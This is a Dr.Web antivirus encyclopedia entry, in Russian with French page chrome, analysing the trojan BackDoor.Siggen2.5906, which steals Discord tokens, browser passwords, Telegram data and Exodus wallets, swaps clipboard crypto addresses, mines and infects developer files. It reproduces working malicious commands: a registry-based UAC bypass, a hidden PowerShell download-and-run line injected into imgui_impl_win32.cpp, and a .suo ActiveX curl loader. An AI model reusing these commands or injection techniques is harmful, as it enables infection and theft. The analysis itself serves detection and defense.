Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BackDoor.Siggen2.5906

Added to the Dr.Web virus database: 2026-06-01

Virus description added:

SHA1-хеши:

  • 8030c42dc54975c43f7625d874e7890f025dc9f4

Описание

Является третьей стадией трояна, который выполняет сразу несколько функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов:

Эта стадия закрепляется в системе и выполняет основную вредоносную деятельность.

Принцип действия

Подготовка к работе

Троян выполняет проверку запуска в песочнице. Для этого он изучает имя пользователя, оно не должно содержать строку «voke9asd89a8sd8aw8d8awd8a» и не должно называться «Srv». Затем он выполняет проверки, схожие с Trojan.DownLoader49.35687. В названии видеоадаптера, полученное с помощью CreateDXGIFactory() не должно быть следующих имен:

  • unknown,
  • Microsoft Basic Render,
  • NVIDIA GeForce RTX 3060 Ti.

Также имя пользователя должно отличаться от любого из списка:

  • george,
  • Bruno,
  • Abby,
  • AMF,
  • dx,
  • John,
  • elz,
  • Admin.

Если проверка хотя бы по одному показателю проваливается, троян завершает работу. Далее BackDoor.Siggen2.5906 получает по именованному каналу pipe\\VccFramework идентификаторы трояна и домен управляющего сервера, с которым будет коммуницировать третья стадия. Затем троян создает объект синхронизации mutex c именем Global\PFNX_Side {Первая часть pipe\VccFramework}.

Коммуникация с C2 сервером

Расшифровав адрес, троян подключается к домену через url {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry, откуда получает ключ для последующего шифрования данных при коммуникации с сервером. Если получить ключ этим способом не удается, троян использует сервис dns.google.com/resolve, через который получает IP-адрес C2 домена, преобразовывает его и использует как ключ.

Во время коммуникации с сервером троян шифрует передаваемые данные с помощью операции XOR, используя полученный ранее ключ. К данным также добавляются различные строки и идентификаторы пользователя.

Затем троян подключается к домену через {C2 domain}/api/mnr/bobby31[.]php?type=fudrocketmod&security={Первая часть pipe\VccFramework}. Он получает конфигурацию, в которой содержится информация о дальнейших действиях: нужно ли заразить Win SDK, криптокошелек Exodus и реестр программы WinRAR.

Закрепление в системе

Троян скачивает с url {C2 domain}/Stb/PokerFace/init[.]php?id=Mother файл «bungee.boo» и записывает его в директорию C:\ProgramData\bungee.boo. Этот файл реализует функции стадии 2 (Trojan.DownLoader49.35687). Затем он подменяет на него следующие DLL файлы:

  • «profapi.dll» приложения Discord,
  • «domain_actions.dll» в папке «Domain Actions» и «well_known_domains.dll» в папке «Well Known Domains», а также файлы manifest.json и manifest.fingerprint в обеих папках приложения Microsoft Edge,
  • «C:\Windows\omadmapi.dll».

Дополнительно BackDoor.Siggen2.5906 может модифицировать системный реестр Windows таким образом, что при открытии архивированных файлов с помощью WinRar.exe будет запускаться вредоносный код.

Для действий, требующих прав администратора, троян использует технику обхода UAC. ВПО генерирует .vbs файл с названием из случайных цифр, в котором оставляет команду для выполнения с правами администратора. Далее через cmd.exe запускаются команды:


reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
/c start /B ComputerDefaults.exe 

Сбор информации

Троян собирает:

  • username,
  • CPU,
  • GPU,
  • ram,
  • геолокацию.

Информация отправляется на {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=process вместе со строкой «BrattSalllatSecretPlace62|».

Затем троян реализует 5 вредоносных функций: стилер, клиппер, бэкдор, майнер и источник заражения файлов.

Стилер

Троян крадет различную информацию с зараженного устройства: токены Discord, файлы Telegram, пароли и куки интернет-браузеров, данные криптокошелька Exodus.

  1. Токены Discord.

    В приложениях discord, discordptb, Lightcord, Opera, Opera GX, Brave-Browser, Chrome SxS, Chrome, Chromium, Edge, YandexBrowser троян ищет токены сервиса Discord. Они позволяют войти в аккаунты без обязательного ввода логина и пароля. Зашифрованные токены Discord — это строки, начинающиеся с префикса dQw4w9WgXcQ:. Троян ищет токены внутри содержимого файлов с расширениями .ldb или .log, хранящихся в каталоге LevelDB, расшифровывает их и получает информацию: ID, email, номер телефона, верифицирован ли аккаунт, наличие премиум-подписки. Украденные токены отправляются на {C2 domain}/api/mnr/bobby31[.]php?type=tknlogprcs&security=Daytone с добавленной строкой «MndayFrOppsLX|».

  2. Файлы Telegram.

    Троян ищет на компьютере папку приложения Telegram Desktop\tdata, архивирует файлы и отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=APLATG&security=Daytone.

  3. Пароли и куки.

    Троян отправляет запрос на {C2 domain}/index[.]php?type=pexists&security=2. Ответным сообщением приходит конфигурация, в которой указано, нужно ли копировать пароли и/или куки. Пароли из браузеров Edge, Chrome и Brave расшифровываются, к ним добавляется строка «BabbChnnn64xaxz|» и далее они отправляются на {C2 domain}/api/mnr/bobby31[.]php?type=pssprc&security=Daytone. Куки из веб-браузеров Edge, Chrome, Brave, Mozilla, Opera также расшифровываются и отправляются на сервер.

    Дополнительно троян обладает функциональностью запускать браузеры с параметрами --headless --disable-gpu --no-sandbox --disable-dev-shm-usage--user-data-dir={path} --remote-debugging-port=0' в скрытом окне.

    Также троян скачивает файл CCCWF.tmp (Trojan.PWS.Siggen5.33623) в %TEMP% с {C2 domain}/Stb/PokerFace/init[.]php?id=Ppkvum. Данный файл внедряется в браузеры, затем он расшифровывает пароли и записывает их в файл с названием brx. В свою очередь, ключи шифрования сохраняются в файл crx. В файл dll_debug.txt записываются логи исполнения трояна.

    #drweb

    Похищенные куки и файл brx с расшифрованными паролями троян отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=ckiprc&security=Daytone с добавлением строки «WalterXPrxxxzCokerPro37&|-|&».

  4. Данные Exodus

    Троян ищет на зараженном устройстве папку криптокошелька Exodus. В случае обнаружения он архивирует ее и отправляет на {C2 domain}/api/mnr/bobby31[.]php?type=APLADEX&security=Daytone/.

    Кроме хищений папок Exodus, троян производит модификацию криптокошелька. Для этого он находит файл app.asar и заменяет его на копию, скачанную с URL balista[.]lol/Stb/PokerFace/RTApp[.]txt при помощи curl. В подмененной версии в index.js (Trojan.Siggen32.44702) находится функция unlock(), которая при запуске отправляет мнемонические фразы кошелька на сервер злоумышленников.

    #drweb

Клиппер
  1. Банковские карты

    Используя регулярные выражения, троян постоянно следит за буфером обмена. Если ВПО обнаруживает в нем данные банковских карт, то отправляет их на {C2 domain}/api/mnr/bobby31[.]php?type=cclogentry&security=Daytone с добавлением строки «AtummmSalllllxXX1522|».

  2. Криптовалюта

    Троян отправляет запрос на {C2 domain}/api/mnr/bobby31[.]php?type=cryptosecr&security=Daytone со строкой «VooZXOOPPPS883321|». В ответ он получает адреса криптокошельков злоумышленников, которые троян будет использовать для подмены других адресов, найденных в буфере обмена.

Бэкдор

Троян получает новый ключ шифрования с {C2 domain}/api/mnr/bobby31[.]php?security=Daytone&type=rtttry. Далее он обращается к {C2 domain}/api/mnr/bobby31[.]php?type=pingcnfr&security=Daytone, откуда получает конфигурацию с перечислением действий для выполнения. Доступные команды для удаленного управления:

exc скачать файл с url при помощи curl и запустить его
RVRS запустить Reverse Proxy
RUNCMD запустить команду через cmd
GETFILE загрузить содержимое определенного файла на управляющий сервер
LISTDIR отправить список файлов из определенной директории компьютера на управляющий сервер
TROLL запустить команду для троллинга пользователя, есть опции earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer и т. д.
Майнер

При помощи curl троян скачивает с сервера и запускает файл https://files[.]catbox[.]moe/lvh9j3[.]bin. Этот файл представляет собой загрузчик, который запускает скрытый майнер Trojan.BtcMine.3956.

Заражение файлов

Троян обращается к {C2 domain}/api/mnr/bobby31[.]php?type=stbcfg&security=Daytone&owr={Первая часть pipe\VccFramework} и получает конфигурацию с предписанием, какие файлы заражать. Возможные варианты:

  • imgui_impl_win32.cpp,
  • .suo,
  • .exe,
  • winnetwk.h (Windows SDK),
  • .vcxproj и .csproj.

Чтобы определить пути к файлам, которые можно заразить, троян перебирает диски и запускает команду. Пример для диска A://


dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290
  1. imgui_impl_win32.cpp. Trojan.Loader.3129

    Объект для заражения — часть популярной библиотеки Dear ImGui. Она предназначена для создания графических интерфейсов для С++. Троян внедряет в файл две строки: в первой содержится пэйлоад, вторая запускает его.

    #drweb

    #drweb

    В итоге создается команда

    
    start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
    

    Теперь созданные с помощью зараженного файла imgui_impl_win32.cpp приложения будут нести в себе вредоносный код и распространять заражение на другие компьютеры.

  2. .suo. Trojan.Loader.3138

    Это расширение файлов среды разработки Microsoft Visual Studio. В них хранятся настройки пользователя для определенных проектов. Троян заменяет оригинальный файл на зараженный, полученный с C2.

    #drweb

    При открытии проекта в Visual Studio запускается вредоносный код:

    
    javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\"
    \"https://pee-files.nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\"
    \"C:\\ProgramData\\S47LY.exe\"', 0, false);close(); 
    
  3. winnetwk.h. Trojan.Loader.3184

    Windows SDK — официальный набор инструментов Misrosoft, который позволяет создавать приложения для ОС Windows.

    Троян ищет в реестре SOFTWARE\Microsoft\Windows Kits\Installed Roots значение KitsRoot10. Определив папку, в которую установлен Windows SDK, троян ищет в ней файл winnetwk.h, ответственный за работу с сетевыми ресурсами. Затем в него добавляется вредоносный код.

    #drweb

    После этого все программы, созданные с помощью winnetwk.h, будут иметь вредоносный код.

  4. .exe

    Троян ищет подходящие .exe файлы и внедряет в них функции инициализации API и запуска initterm. Затем файл начинает работать как Trojan.DownLoader49.35384, он же стадия 1.

  5. .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) и .csproj (Trojan.Loader.3126)

    Это файлы проектов Visual Studio на языках программирования C++ и C#. В них добавляется команда PreBuildEvent, которая запускается перед каждой сборкой проекта. В ранних версиях добавлялся код

    #drweb

    Сейчас код стал сложнее, в нем появилась дополнительная обфускация

    #drweb

    #drweb

    В результате вредоносной команды записывается вредоносный .vbs файл, который, в свою очередь, запускает PowerShell payload. Троян делает запрос к URL-адресам:

    • youtu[.]be/akoxddx6lgc,
    • steamcommunity[.]com/profiles/76561198737324192.

    На этих адресах хранится другой URL-адрес, зашифрованный с помощью base64. После расшифровки троян получает C2 домен, к которому обращается за нагрузкой, сходной с Trojan.DownLoader49.35687.

Матрица MITRE

Этап Тактика
Выполнение

Интерпретаторы командной строки и сценариев (T1059)

Выполнение с участием пользователя (T1204)

Закрепление

Автозапуск при загрузке или входе в систему (T1547)

Компрометация бинарных файлов ПО узла (T1554)

Повышение привилегий

Внедрение кода в процессы (T1055)

Обход контроля учетных записей (T1548.002)

Предотвращение обнаружения

Обфусцированные файлы или данные (T1027)

Маскировка (T1036)

Обход виртуализации или песочницы (T1497)

Обход контроля учетных записей (T1548.002)

Внедрение кода в процессы (T1055)

Получение учетных данных

Кража сессионных куки (T1539)

Учетные данные из браузеров (T1555.003)

Обнаружение

Запросы к реестру (T1012)

Изучение владельца или пользователей системы (T1033)

Изучение системы (T1082)

Изучение файлов и каталогов (T1083)

Обход виртуализации или песочницы (T1497)

Изучение установленного ПО (T1518)

Изучение местоположения системы (T1614)

Сбор данных

Промежуточное хранение данных (T1074)

Данные из буфера обмена (T1115)

Архивация собранных данных (T1560)

Организация управления

Протокол прикладного уровня (T1071)

Веб-служба (T1102)

Передача инструментов из внешней сети (T1105)

Зашифрованный канал (T1573)

Эксфильтрация данных Эксфильтрация по каналу управления (T1041)

Подробнее об Trojan.DownLoader49.35384

Подробнее об Trojan.DownLoader49.35687

Подробнее об Trojan.BtcMine.3956

Индикаторы компрометации

Новость о трояне

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android